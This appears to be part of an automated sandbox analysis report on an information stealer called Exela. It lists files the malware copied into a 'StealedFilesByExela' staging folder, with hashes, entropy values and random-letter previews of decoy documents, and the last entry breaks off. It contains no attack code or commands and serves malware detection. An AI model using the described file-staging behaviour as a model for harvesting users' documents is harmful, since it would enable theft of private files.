                                                                                                  SHA-256:841F74A72A1D21F63E4039906E93A4FD9E70EC517385DDEE855033A9A17FE94A
                                                                                                  SHA-512:FEB2EEC88720FF040794CD273A7B4A07DD5AC1E6CD9A9235A098F1FB3A1C50385B37E376764C927978961A0EE4AC1C591F197494D82D71B35EAA3780956CB1A3
                                                                                                  Malicious:false
                                                                                                  Preview:AQRFEVRTGLRPNVUMAMHTYETEVGDENHEHZDAQRXZQCDHHLTUZIEJRCQGGPRQWBIYWADWJEZTAELERKZUDZJHSFVIUPBTJVGKYQFWVMPTQUZUZZSOJNBOABYGRCYMPSQARVQUZQVCNVECXPCBIEBYWXWSRMTKFKBEHRJGIPFMOYSZMEELAQPGBHDTUPVXJROQBNFXLTFTPQHVAGKBRLNHZRZVUTEGANMGKVRFJJNOMKLVMQNTHIORPQCPGNIZSOYKXAQJCOPIGBQRJINVPIRVOHHCOGWQPXWQEGDKAHJASRIJBIMZDOWPSCSZZQNZFPNLCIRCXKLGBVXKUJASQXRHFULXFGHARZKMVRSMXPJPUDKEQXOSCEBAKVRLNKSSEVKXVMESKRHMKSXSUKELGCEYTRDUXROEARVKPGFZHNSDRPAQVQVSCJPHBVIRZPYJKRBBZNOUQWXJMMJNDFWGGJPGQMMWRHVVMGZTXMHGJMPQFKEKIAULKOFHNCPDGWVUWIVKGZHFAQVQOBPOUZZTMTUXLURTPHPWRVYABSKGEOJTHCTJYEQSHAVPELOSNLRXFRVWMHJRZTZLGKGNKELBIANUAYANWKNNJPQUXDOBXLYTGIGYZMXXBSVTKCOWSZHFODTFONXVLBRUGJKEZMTIRWSGAANCFOWQHTMLCODGMRHITYHVPOCCXAYGLOXHITQDUATUBKLPLHFHTHTEONDGTWZOQVYRUABLZCNSDXFSTUTQJACVNWWCLMGVDGIDXECYLUJKBUKWQQUERSQSLBAKCXGRYMXSMUPSLSRDICMSQOGBWCATEAACXPGZFMXCSVNIZUQRAQEWTFWYKNKMGGMAZDJHXXORIHLHSPMGKAWZUQOKTRGEGDEPETKDTOVQKFNIASUNQNVNPECXIFOSOXOYCRVRJAKLVRMRCMTVZUHFLJPYFXCUSTATJHRIINTHARIAPEKFSUPRLIGJHIMRLJERLFFTZAQPSMLNNQSZLYNDGBIYC

                                                                                                  C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Documents\BXAJUJAOEO.png

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\Exela.exe
                                                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1026
                                                                                                  Entropy (8bit):4.701111373123985
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:wSplMoG/A1oXDoMwazZW6QAFWyGjkGKnEuDxOaV9YnF7U:walZG/A12L8MFYr8EuxTK9U
                                                                                                  MD5:CA5A3E2A0C2DDF92EABE165672425976
                                                                                                  SHA1:1933AC1A510945A766039E7E61D7DA4156E0F074
                                                                                                  SHA-256:4180C6A01C86C7D86A51B5C17957BAECF34EBB7FCB6C5968835A5DB64E3C9667
                                                                                                  SHA-512:64FC7B64CDAF57CF026C803A16036BDDC46CA86AC9C35A804FCE188AFA3056C324D62CCEBD45E7E607A53D11A1035CB6C38B24004D14F0DC17B11D8DFBD7DB6C
                                                                                                  Malicious:false
                                                                                                  Preview:BXAJUJAOEOZPYQVMPMMPXXMVCPSLTTLUOLYYQUQKLRMOQNFWEOCYDOLITPCVDLYSWYQACZEJIDILMNOOUVEVBOSWPXYLBOGFYWHZVFNHRJXYLODFWJLFJKMUXRMLQJAGMERGOWKSMBXUJUMRUBMROMDBISUWTFWPXBVVSTBYHRHUOKCJNGMCOLUFOVLKFFIUZHRPZUITDNNTTEJKTUSBPVEUSTDXHRMZNWZQSUEGRYELXBLVKZHEIVACMOHJWFJRPJKNIDOXZHIEUDGLSGKALGUCHSOBYGTVWDOVYUEMXJWYDCHTXKLWDJLIZFFBQOMRYKZVRXZYKIPKCJEYOVOQCGFXCUNQKHYBXFYRGYUQAUKMCSQKKDJIQWKZEWMJWHJDDENKZLPNJAJLVIEXHEGVFHRIOBAWGXOXLQJIISBHZZGJYZBYNUOKMCKTICSMRTMZVLKMZTCWKHOHWQBKEBGEASMMYEGDDSCGDTYEPANLCQSJIRCTCUHXIVGBREMBTULUXWAZISUYERUZPWQLRSPPVNCMSPDUHQTJKYNEEWYIFNUCJJSDFDNQJLWDBLURDBXKLJVMGWUBKEXPYFIJNWRSUNUJBZAWJQEZWEYFLNXWPKFJZFMVPYOJFFUYCTEUKFWSOFUOTKIGENNTAAXCAHPWQNKMKKGNWIOGZOBPOTDAQLZSIGMQTNQVGQJNNITTRMOHBPCHTGJANZTLZHNSTOQXJKIAZXWPQWIDJXZUURGYMTMZTWQNTRVEKAAWBRZQWZYVWKWEVAUTRSOXDHWSYIZYRJFVXSPNFOTDNAGHDFYSAEEFBXGQQGYMZHMQHZTDMNYXDQJKMLAXJWCBQUIKQFEPVZNRMOWEKGFDLUJLSXRKKJUIGCSCGZTXLHOWGMKDLSQHDWSPCYROUJEHKXBJSADOXSOMTTUGHDSOBTNUEDCBNWNIDSDBZKBGFCJHQNDVAAZTKEIMDCTKNOQUKPNHEQOBANQSCJQRQBRAIBBXRYTT

                                                                                                  C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Documents\DQOFHVHTMG.mp3

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\Exela.exe
                                                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1026
                                                                                                  Entropy (8bit):4.702862417860716
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:JCmIDeBF63lGj/+QvH8n8JCl7odrVgKqBP68iz:4QQQvHFrTqBPXiz
                                                                                                  MD5:CC0686FCDF6617729D1EDF30F49501F1
                                                                                                  SHA1:02D629848E3D467D8143B057F003E0D7448126CD
                                                                                                  SHA-256:31E15305BC0579F03C51A1D6534B332F32C73ABC6D1B68BA0BDA6FCF97F593C9
                                                                                                  SHA-512:8BD18EB486BA6D2799329D9A8EFB3F52C3D109F5CB070290418DDE4B58756CD023857E4CAE62323C530FA0D3A60372C97D9744C1911A688D3592EABD14005F25
                                                                                                  Malicious:false
                                                                                                  Preview:DQOFHVHTMGONGZJMTUDJRBBZMRPVREMYHKGEHFUQYXZCSKHYXSDQYNTHYMAXXVSVAUOGMFIYPDCQLTHSECIYLWTRIBFEAYHUXINIFQBTJDZMINEEJPQYKGEESHWZILKBYECTPQSECVJBFSZOCCSNOVPIAHSFZWVXPNEQGUOXWPBXJRUYFARJLNHPVXAJZAMAADRKIWNDXYEBYMEBSXOJGEOURNOIBBLONDSVHAOQHPMGXZYJJTGITBJPQEBNXGZYUKARGBCVCJUHSRNNEVOIGUVCJVMNFBKNVZYQADNKMLUVPOTXVOQFRBXUSSRFMQEZCJFQXKCGKGKCVGGVBKNPTNSSMADFJLSDMVXHSOETKCENTGLOVOHUYJFTIWFHKFJRYNOXVIGPLHNBFPFOCWMNOQXWIPYAHPKRVTBFYKRBDVDUAZBSLWPPMXJXDVRCRPKOGCUKNZKBLJGIGZASUAZBLZBMGJSBNQSVTMGEWGLMNJKCSBEAGDUINAXDWMHJASNQRRDMKVXOKATATHRLEOJRPCUOAVQIESHZYWIQCSCAPIAJHBTEIYVRFEDCQDCDIYPMQVBWUEHDPIDAGKYZBMLBDUTEIFYLBSHAWEMNTPQDCSTOWSBZWQEBLVBNUWKZFUDMPBKETDOEOIXRFTDUFIBPBSUHXQTCPRPZAKDTRWMGSAVOZBNDDMDIHBSGIPOMYLKSGKUWRGKNXSOLUZDUZYQFQTKMNWLSYKVAQVIHJTFYNRTERQMIRVMLNWEIMHPIWEWIZJJRGOCBVHFGCSCPAIQYTEMYIQJKVUFAZERTMPUQSRHOZHOYABIALCSKDKHEDHJGKBYVCDZGPYPCLDCEFHWFMLSBOUUGKJFXSVKJVYVTSMIZISSWNRRWBNOMXZCOJAULXRXTNHTYWTZNFOKXVGZMTRVOSMSRMYBHKSHRCPZSSMDBJOTQQRGYIHEMZHHSWECVAOPVNLGBYHZVZPLQHOTCJNPUXICWZBLKAQFGUZPW

                                                                                                  C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Documents\HMPPSXQPQV.pdf

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\Exela.exe
                                                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1026
                                                                                                  Entropy (8bit):4.698711683401115
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:qKHpKPokvebe5xXL3g76mBU/gS2JBbl20IS7pnXk:Rpcjnxbw7TYgS2nbzIS7pnXk
                                                                                                  MD5:47643CE7571E0C995094D7CE5F2005D7
                                                                                                  SHA1:40D42828B2F68C625EBD884FB8AF5B20F5A1DF9C
                                                                                                  SHA-256:1D642D4EC7BC821B0FFA28C3F2702C875C922139D8001EADD664EBCCF8D321B3
                                                                                                  SHA-512:3AAD0470C01D2609662C0B8D146BA79132B404C669C22032D085233E2D30725797AC2E15A11F54DFE00E4B6CA6E914E3439D4775B3AF6D782334FE9424F485A5
                                                                                                  Malicious:false
                                                                                                  Preview:HMPPSXQPQVZTKYGXRLZXZQHGCZSWFSMKAZTFZQVPBWYDEIQOYRZBKZROCVLLNDGOXMZATHCHJWBWCKMDMUVOMUCFYNBSIKMCOOAGLUHDSCAREEEQGTRYCAFLTFVCHREFHJJALACUPWFTGZJJVRRQBVOZGXIEUBTJBNHNAXRWAWTUYQZIZWPARDBZBFGZUBQQPINOCLFOLDPTMWQVUUBDSNGDFVMEOTHPNKBOMDPGLFXUXBXHUOTYRPUQTUJPKLUSNTISPNFAHVFBBWEWJQFBJFCDDWUUKCQJNEKMUTJEZKKMXXOCBOVMCGGYTPDYBYYFVGHQJJBCDHYWPXJUJWPNURQCUHPTATLFRAOGUCJWWSBAITHVPDRYRFCTPIWHJVKSAXOIPKHISTBCDZISGIVPPYDJLJWFRNVNCWIOINKYQLAFVLCPSGCZABGNTUVGEDQZGQNDECUBPLLOYUYTHXDNNCAXKLHFZXBBAWBICFREGZBLZZMPWRLUSXUNEXAKLSJETGNCJTTGSNPPSHZUKZDHHYHBBWKJUSIBAKGKHQJINZHCWLBCIIUGTVVLNEZXUBIPUVRAILLENTRJYFNIBHNOUNYAIFQBNUMFUSXNGITFIFZKTSFAQXDYVBIUCIUYJIGJTIJHWTPPRJQVSBHHUXLZRPPJOWJAPSVQQVKLFHKXZRPEJBFXNKVNBCPMLRQGCJINKLLBJVROFAFCDRFCDAMIDEYSZDWNLUMJZXGWKOIKNAYVXPYRZWMBNAAFKFOPCVNGUECOARMDWJVYVUQQAFEGKCYXVVGXPHPEVOMRADTQDTJSHAKHPNNOGUDWBRXDJFEMSJTJUJKHZONBLGDCDDUDTRQKPOFACELSKHFSBPKXKDGWOKSDBAMWLKXEAOOHWVOAQZGZCNSDWOXSHPTFMVMYQXTRNMUPZSFQXOQLPUFJWHWTXXIRMQXDPVAJKHMSCGTFVJKECYILRMHGFBWQKUNTRVZTBJQJAKTSJUIDOLPL

                                                                                                  C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Documents\LFOPODGVOH.docx

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\Exela.exe
                                                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1026
                                                                                                  Entropy (8bit):4.698393795110914
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:weX7B5oYsT2B9e4Feb4OKL65JIiga/zOnv9iY81icgfiTetEc8E:FPoYsqB9e4dP63IigGOvo11LetEc8E
                                                                                                  MD5:7C5655873C22D2522B13B34841F82038
                                                                                                  SHA1:ED733AE5B3E813B97D69E7283AEB8085EFC62B78
                                                                                                  SHA-256:9A515FAA0EE108930EC0C597C9E2CA74B21C3C9D45F3F845954A65F3FA4C494D
                                                                                                  SHA-512:A98C25203B5A8C5C3FE7859E1B128BA3C0B5691BE716C53CA427770F10EC65CBB8B704EEA994BCE1ECA69EC4D46BCC0D48FE844653B964E96D1248D2E211CBD2
                                                                                                  Malicious:false
                                                                                                  Preview:LFOPODGVOHLLKBCXZQUOXPFEKGPKVDEYIZRZGQPAXXVWAHGTCBCWCYBHYOPHLEVYFLCEXNMVAAPUECIPRDZTIBJFGFXDAEMKYPYGCWSRTCUEEDISUDHVYQEPCSIKRBOXVZVTBFVUQHQYHEIWQPMZFNXNKGPPDGDMKJWAYJVYMRCYCWORBYPZYIFTAANBVDPJJOGYMYDPMPCNSOQVKLKNKHQVJQRYOOACYXVWFBJGOZRXUBDUSJEQNJXCVPHTUWAVCILOAXOWIJVWKMAIOEWTHGQELYIGVJJZNFBDSZXPZMLZNFDRIJQQQDSSMCBEMRHVOYIGRXSYQYDLBDBDJCVRREJGRUBPNYBFUCUXLMUIULULHCWJQQEMKBQMLJBDJQHFXPNODSTVZXWZZOXPIXKBRKMKOYEBDUBYOGMGXHFMCUIKRQYQMHGUBUAAFTMUCZNIIVAIOOBIASAJPKXIYIQIRVIIXGNUEDAXQJYWQXOBTAINKSTSHZGNUWVHVDUXVGWBWRXOYEGSIRNXRHBFOAWRQVFKAGDUSHRWQWJQRNMOGHTWFHOOZGRSVCSEJNMPDYUGTSBOMGHSHACUNTVVGKNAZSSLLQOXMCBVKFFAQLQCWYNIWPVJRECIKVCXZGCNHKXMQDPPOURAWIKZOZEFLDUYVIGDPGUMGOGBUYKGLVLWQSDAHAAIVFUNWQIWKRCSLCPMZBWBBDTBBVTZNYCLEIZNLQRHKBOLVTUTWSURDWQTCHAPUMJQWNVWVGFLAAPEHMLBUSYJCZDJUMZMKIOKIMVTYPMCXUXWVXIMVUCNXESHIVCKNFAALGDXCVJHQZWLDSAWNJWFBTHDBKGVKXLWDOPOOBJMPJCKUXVNFQVOUEIHJKOHTDCQCDOFQBMSQNWVDKTKWJIFVOMWEUJULPMGUSEWAZAHAZVGRSWNQYXPMKFWQGODZHVNOEXZBPLONONBPAHCDWEMSFLRJBFMOKMCLAGRJEGRTGVETXSZKDXQWEOD

                                                                                                  C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Documents\LIJDSFKJZG.docx

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\Exela.exe
                                                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1026
                                                                                                  Entropy (8bit):4.69486718145169
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:XvKYeI9D5UOyoiaxIKgpZ9ONvMyTONN5ZjJH1U:yyD6yxILZ9OtTT+XRG
                                                                                                  MD5:E63B196AE0D5F7670244FB1347D75EFC
                                                                                                  SHA1:1C17108AC7E5263674836BAD67AE44D8C3C6890B
                                                                                                  SHA-256:D8C0D7B9CDFC72CAAB0A7687299B6734708E98C6DD088CDB0FF1A659E294B49D
                                                                                                  SHA-512:63345352964E1BD19AC843F82820E9B29C5BA991A002AB9B3164E1AA10B6D88BFA0DFAFA2E91E584835BA89B6A1770140AC14EA0B4B64E6C3BF8CDA34C9698AC
                                                                                                  Malicious:false
                                                                                                  Preview:LIJDSFKJZGBDGXNCCVBULCELYCDFJRIXKMFPVDHHKPYEYOXKFYMNEETRQHXLDRVBOTNERMYOYUJOPHUSKFPWBGKNJYBGZTTHNKGNUZWATSMORYBOIKBFSVUUMZNDYXOYKYUKGRNFVRQOPBEEIPDGTPBXCNLKHMGPHFCEQOUTEDGJZTMFUUGECZETRSODGZCJVQEAMRZADPDVQRANZOSHTGPOXPXGXXQDJVYZOCNXDECWJISPPIJOZUBSSKPGODUHTISNESPZRLELINJJYOXSBFTVUDENIBRDIMMGFIQNDGUSXDBHQNJRYLFTZGOCELKZGOQQKNDPFAMTXHBKHJYXYEGLJLANRMMTCVEFYRTWLXIMCCHDWVOLGVUWRNLSIBMLMBKVSYLKXRTMZROHVHCRDBCODTPNVQMBPRJGBGOOFVGDIERMXUFETJQWDXSQQFMQAZGGRVNRCUOAVYJDIMQETJOANIIDEGJCHEFRSNVBQAQBBUTTMXBTJXRHLSOCTPPBIKPXITOOCINTVZYAVQLVOOZWSOPLYJPOTKFKIKEHIDDPCDDEPKVDYQAVTVBFYYWCGUKGIDVLQSIPXISDEDNJWONTSILFUGUYMKQLKEJGOOCBYSXDFHNFHHWGLXWWQKSSOHSSTZLRZVRHZVBZGGEZQFSIWQQPMILSPBAMPAGAHHVJJCITDTJRZTRBEXSXOVDKONGLMSWBAOOYAFISJHKEYUKIWXBFUDUMVQRELEPVTNQBALAQOEAEFVPIKNYIPNICGKQFRVXNQUEFULLOYWMHOMUFEMHYNKNWMAOBGWSECZOKWISDOIKSUVWBGWPNAMFUHBRWEJQPHFPEKIRLAEPTBNRQEUVXXIZSSOOEFEETUMNPSVEAKOXVYHAOIXBEYBVXDJXZCNDVOPZLARFFUSXUOWXQBKDLINBWBQLXLHHNIXZEPCNHFEIZUZSTXWFUITSBKYSELMNKNBBDQMNLAIOSKYHCWGFPNUXAFSRHOWYH

                                                                                                  C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Documents\LIJDSFKJZG.xlsx

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\Exela.exe
                                                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1026
                                                                                                  Entropy (8bit):4.69486718145169
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:XvKYeI9D5UOyoiaxIKgpZ9ONvMyTONN5ZjJH1U:yyD6yxILZ9OtTT+XRG
                                                                                                  MD5:E63B196AE0D5F7670244FB1347D75EFC
                                                                                                  SHA1:1C17108AC7E5263674836BAD67AE44D8C3C6890B
                                                                                                  SHA-256:D8C0D7B9CDFC72CAAB0A7687299B6734708E98C6DD088CDB0FF1A659E294B49D
                                                                                                  SHA-512:63345352964E1BD19AC843F82820E9B29C5BA991A002AB9B3164E1AA10B6D88BFA0DFAFA2E91E584835BA89B6A1770140AC14EA0B4B64E6C3BF8CDA34C9698AC
                                                                                                  Malicious:false
                                                                                                  Preview:LIJDSFKJZGBDGXNCCVBULCELYCDFJRIXKMFPVDHHKPYEYOXKFYMNEETRQHXLDRVBOTNERMYOYUJOPHUSKFPWBGKNJYBGZTTHNKGNUZWATSMORYBOIKBFSVUUMZNDYXOYKYUKGRNFVRQOPBEEIPDGTPBXCNLKHMGPHFCEQOUTEDGJZTMFUUGECZETRSODGZCJVQEAMRZADPDVQRANZOSHTGPOXPXGXXQDJVYZOCNXDECWJISPPIJOZUBSSKPGODUHTISNESPZRLELINJJYOXSBFTVUDENIBRDIMMGFIQNDGUSXDBHQNJRYLFTZGOCELKZGOQQKNDPFAMTXHBKHJYXYEGLJLANRMMTCVEFYRTWLXIMCCHDWVOLGVUWRNLSIBMLMBKVSYLKXRTMZROHVHCRDBCODTPNVQMBPRJGBGOOFVGDIERMXUFETJQWDXSQQFMQAZGGRVNRCUOAVYJDIMQETJOANIIDEGJCHEFRSNVBQAQBBUTTMXBTJXRHLSOCTPPBIKPXITOOCINTVZYAVQLVOOZWSOPLYJPOTKFKIKEHIDDPCDDEPKVDYQAVTVBFYYWCGUKGIDVLQSIPXISDEDNJWONTSILFUGUYMKQLKEJGOOCBYSXDFHNFHHWGLXWWQKSSOHSSTZLRZVRHZVBZGGEZQFSIWQQPMILSPBAMPAGAHHVJJCITDTJRZTRBEXSXOVDKONGLMSWBAOOYAFISJHKEYUKIWXBFUDUMVQRELEPVTNQBALAQOEAEFVPIKNYIPNICGKQFRVXNQUEFULLOYWMHOMUFEMHYNKNWMAOBGWSECZOKWISDOIKSUVWBGWPNAMFUHBRWEJQPHFPEKIRLAEPTBNRQEUVXXIZSSOOEFEETUMNPSVEAKOXVYHAOIXBEYBVXDJXZCNDVOPZLARFFUSXUOWXQBKDLINBWBQLXLHHNIXZEPCNHFEIZUZSTXWFUITSBKYSELMNKNBBDQMNLAIOSKYHCWGFPNUXAFSRHOWYH

                                                                                                  C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Documents\SNIPGPPREP.jpg

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\Exela.exe
                                                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1026
                                                                                                  Entropy (8bit):4.701796197804446
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:C1U2g6pCwYBq9+pGzEcrz023TZ9iFxwELi:2U2gCCm9drz0wTZsIEe
                                                                                                  MD5:C8350CE91F4E8E8B04269B5F3C6148DA
                                                                                                  SHA1:22D523A327EBAF8616488087E2DCE9DBD857F0CC
                                                                                                  SHA-256:1BE0B3682C4F3A3315465E66A2C7C357BB06225947C526B1B89A39D9D120AFBF
                                                                                                  SHA-512:C4891D35B6E895E4A9F4A785701EFFA4305AE88D09D309865F9312D95C296CB417916D8CBA461099E80F68C5AE5015A1172E60319256A453DE81445660F55806
                                                                                                  Malicious:false
                                                                                                  Preview:SNIPGPPREPVDSXKMBCQXEQRWSYOYKDGHPXSNVTYLWVPMUIXPKXDRFHMINIQBFZTPTVMTSZAWIXFLHCKJNAWKCQYMBHUKFDOIJBXXLUNVNMKEDOTTPPDLIAGSTXKJKMHVVGIGUNGKPTPDUEUVMGZRIBRMBHLZOZZIBTDOCDOASXCIFRVGCSENFOEARIYUEACCMVFPUDRRUHYQQFJBAWDGKHRWDHTGYUXKSSVSTFCVQOQGTKOBOMZZTKVYFLAXTKJMTUDSETBGCOOKYGPLGPNAFICZERONWJHOMIWLGEWSSANDAVRYRUWZSRNZFYKTMSQXLZZGTQKXVQLDKQIHEDADRTKYMYNBVWROSFBYUXYULCESFAKNPBXYOELAWZCZFAPVQWMMNLBQRIPMVDMMWGXGKDJNUJGGGBNSGWEDDLRHGAAWJCYOEMVEHAYXYEHSKMWJPPHERNLXAGENBCUAZODRTUDIOUWNPZSHJGYOVHWQKWRAGGUMLCITTLAJXOXDUPFFLAHWLWPRQRAXSKOBHTXQNNGYHHVLBOEFTHAXTLKUGTNIYSDATIJHBUFTSGQHRXQQGXCBWVJIULNMYSMFYMPXRZOWMHYMZOLIBIYHPQRQJTZOMJZHKRTSWQQVINGIZHWDLNCJKAMKHSMFOTUPQMESXHXMJSAXESVNVSKORQSXVCYCKNZKOFZFUKINTRLLEGXVQTQURFVKWLFRQZVQVBVOEMATWFLXFDJVWCYMPYCSJCUUGUCIPOPIVLEFNZCPNYAWTXOATSTYLECDEFJNQFYGVPQWTJBNAVWKGALRTACLENBODJOQDXMPOYCYEFXOOOOMCQXLRGDBUUVJNQAEBZDSPDLPFIEOXRWSFCHXDUSBTSLEDLCZPOHIMIMQZMHHTMDFUUMKUAMBYNWWRQKDEXPPDWGKCNTWTFNHBMNDQIMVNFYWGALYORHHPUAXLDHMTGOKMMTAOCOVLGFIHZLZFADWMNNCWOLNJDSGFCWVDBYK

                                                                                                  C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Documents\VWDFPKGDUF.png

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\Exela.exe
                                                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1026
                                                                                                  Entropy (8bit):4.696835919052288
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:Fn9jgzow1W6XZpt5tv2wi/9nymo1rcjQV26NyDmb5HPZ:zjgEw1bpfTi1yfhcUV2by5HPZ
                                                                                                  MD5:197C0DB71198B230CF6568A2AA40C23B
                                                                                                  SHA1:BAE63DD78D567ED9183C0F8D72A191191745C4E5
                                                                                                  SHA-256:6935BFDC854F927C6F05F97AE4865ECAA22F7D10D909725B7D67D87F17FF0F41
                                                                                                  SHA-512:972C7D9B89EBADA01E3C2D21B391AFA317A8B587DE768875B3B7082761E17AF795BF72B49DEE71DC1F5363863EEF3C7E2966E6AE3D2E6F481E373A77163316C7
                                                                                                  Malicious:false
                                                                                                  Preview:VWDFPKGDUFQFRUPAPPQGIIRLBMRJVLIMQXSWPKBCUGCSOYPXVZRYABCFRPGQFBKSRNNBPWCDTZQKOZTHEOXCUIMHAWUSAMNXIIEPWHBTSEWOJOEJUQZAZDGIRHLRLOCXDMGTXDXEJOWMXIFWDAGYCVGTBKYMXDYOTCGCARASSUUCMCNKFTCZOAQXBNILJTUOLCZYYUZFHGWFTCHDXYTZOEGFUAJLGZANLVNEVWHIIIRSURMEOTZWVHRLOGMTVRWICZIENOPRWLNSVHXQMULNZLBRICRJVVBJMJGVHJSCKBXVMICMFJQQTCIUSXRLUSMTSWGCQDGVFRQVIURPCVBLZIFEZKBUZGKUJIZAWRLYVVXWFGKCMRQFIVHFVXBDHBEKOJAILQRRTZPUTWBVRNRLZEMFWWBQUGOQWYUEGPKIVHQJHQHSJWVVENNMOAHFXILPEJPHZOQMAVSUXBQQEJFNFIKFQWEWEPKTIQQETBFSABZAOBVXEBARHKLVLMCAFGXXBLNGBZRJQOGMNGDAODYAVKYTFOYJRZDLZIYWZNRPPVZNHCTKOIHMETIQDHDGBHUSSZDLEXZSKRZLTIUMEADMONDOIPXWOAELAEUEJDZBECSINHBJNAYCCYTMEJUWYDNJDACYHUQIQZZBMKKRCJDQSGEHBSIIWWFOPRPYXHWNRLQFZPXUQSZHWHJGRVRNYZBBQUFKAWZTIDUQSFTJJPUAKBRGABJCNWDXOUPLCRZTCKKHIKTYZOGNWDCTUTSDFJLIDJMCLEXGJRUQRWREGZISCYJSMOFQXYMCGMMJMSQASADRKRHYGUYLIBJAAJOTHXHEVLCQEGGJBJBKULCPBXSIOOIEJPQIXDQHKAQSQMLWOISQZQTMTCLGTEHDXRHOIVIVQGKJJACQWPPTBGGHHKJRRPRENADLUPCMGIERRBDQYQJFUSIHVYGVGSIQZZWUZLCSUBMKCQYKCYTJRNNKEZZWFQMXWYFKKWAXFIFRJZTE

                                                                                                  C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Documents\WSHEJMDVQC.mp3

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\Exela.exe
                                                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1026
                                                                                                  Entropy (8bit):4.694142261581685
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:f9GDi2EYjkpBrLp83PYbuFr5oKIQppDgX+qrctnWyd3z+g8BHGZ:yEYjkpZYwS/oKIuA+qriTjEBHe
                                                                                                  MD5:E9AA17F314E072EBB015265FB63E77C0
                                                                                                  SHA1:1233B76350B8181FFFC438B62002C02B4AE79000
                                                                                                  SHA-256:F66078FCFEC2D71549136CC8B5B4EE7D33C4994E0A4E3E7C11F5ADCD819D0436
                                                                                                  SHA-512:719E659924CE585E4DD8CEA9BC6B5371AD810999022F874F380F50C7153D3AE97CC934E3173EF06573CAEE6CBC835A668C4D7DC2ADE597B1B0D200FCBAC67DA1
                                                                                                  Malicious:false
                                                                                                  Preview:WSHEJMDVQCWJPIIWMEHEPOBRYLOZOHFMDEEYYASRZPHJZGFNCKWIQSPBUMWBCKDMTEBFINALYAFGJUQXINNGDKSDBFBQLHYZRLLDJYSVNXVIEPIYHZGOTARYUNPFNZVRVVWIOWWFIFWCHVVHXNGKFNRNLVVSOPOMGZCDQUWJFARKTCAVVDPTCPNIDLRGSLNKZTVRAJAILYGDVIAAGIVKXRCRTRZJPKATKZAWRJTPVLTDNBDIRDWCCHBTEVEGYPYDTGSMLUDQXMQCAVHLYMRKPCVHQHMGNCGBZKOUKCCBHQPSIYIJGDVOYJJJRQLDKNVUEXDKCTANSMCHJUBIODALXWUAFPSECIRPCAEPPBACCLXBZAEDKJHLGOICLSKBQEGFCVDQOFKKAJPCTRIXBNPUDXKHSSXTDTQZSFEWHTHKFNJWHOEXGCYSYWIHFSMYJIYEESDQFMESLFQFBUJNXHWFNXIDWEUDMVGFDXPTRRRNPARVUGZAYZRHNTXHZAPBLWMHFSSHMXCYMAGONQNLTCAVPZPCAKJRMGEPDIFETDNSXWPDVMAZGTTCLNRREMVTBLOGKASYOATUDXLJKIYPPDNLZIZMWWFFDVMUFCTZZOFJORNAMGQBAFGCPTDCZBKTIGYDSCSPMIEXAMGICZNTFVNRPLGPMBXJHNCQSYNMGGPKIQJNDBDUBVIVXFILKXZXHODXZAYIDEIMZZMKQNQNBCCMZNFBKSYULDGKOMQZDUQMUVTBBTUTRZMIOZGDEUPHCDKJQDSGBXYNWPWTHYVLGGYNOBJJKAZSTKJSBCHVCLGWYHCNILYSCYCHTGYOGMNGWDZAVDCOVKWJPWVNTTKFTSHAAXLYUEWEVGETFCFTLKWTQCVAMBWYOYJVXNPSSWXJXUZDXJOZNTBLIZLLJQXYNILILMHHONBPAPFMVWEMHIHAGMOXTIBNNEBGCVSZEZTMJVDXSVACSKTAVTFOOSEHZQGTOUSCIQBVIWZGABQNZGJE

                                                                                                  C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Documents\WSHEJMDVQC.pdf

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\Exela.exe
                                                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1026
                                                                                                  Entropy (8bit):4.694142261581685
                                                                                                  Encrypted:false
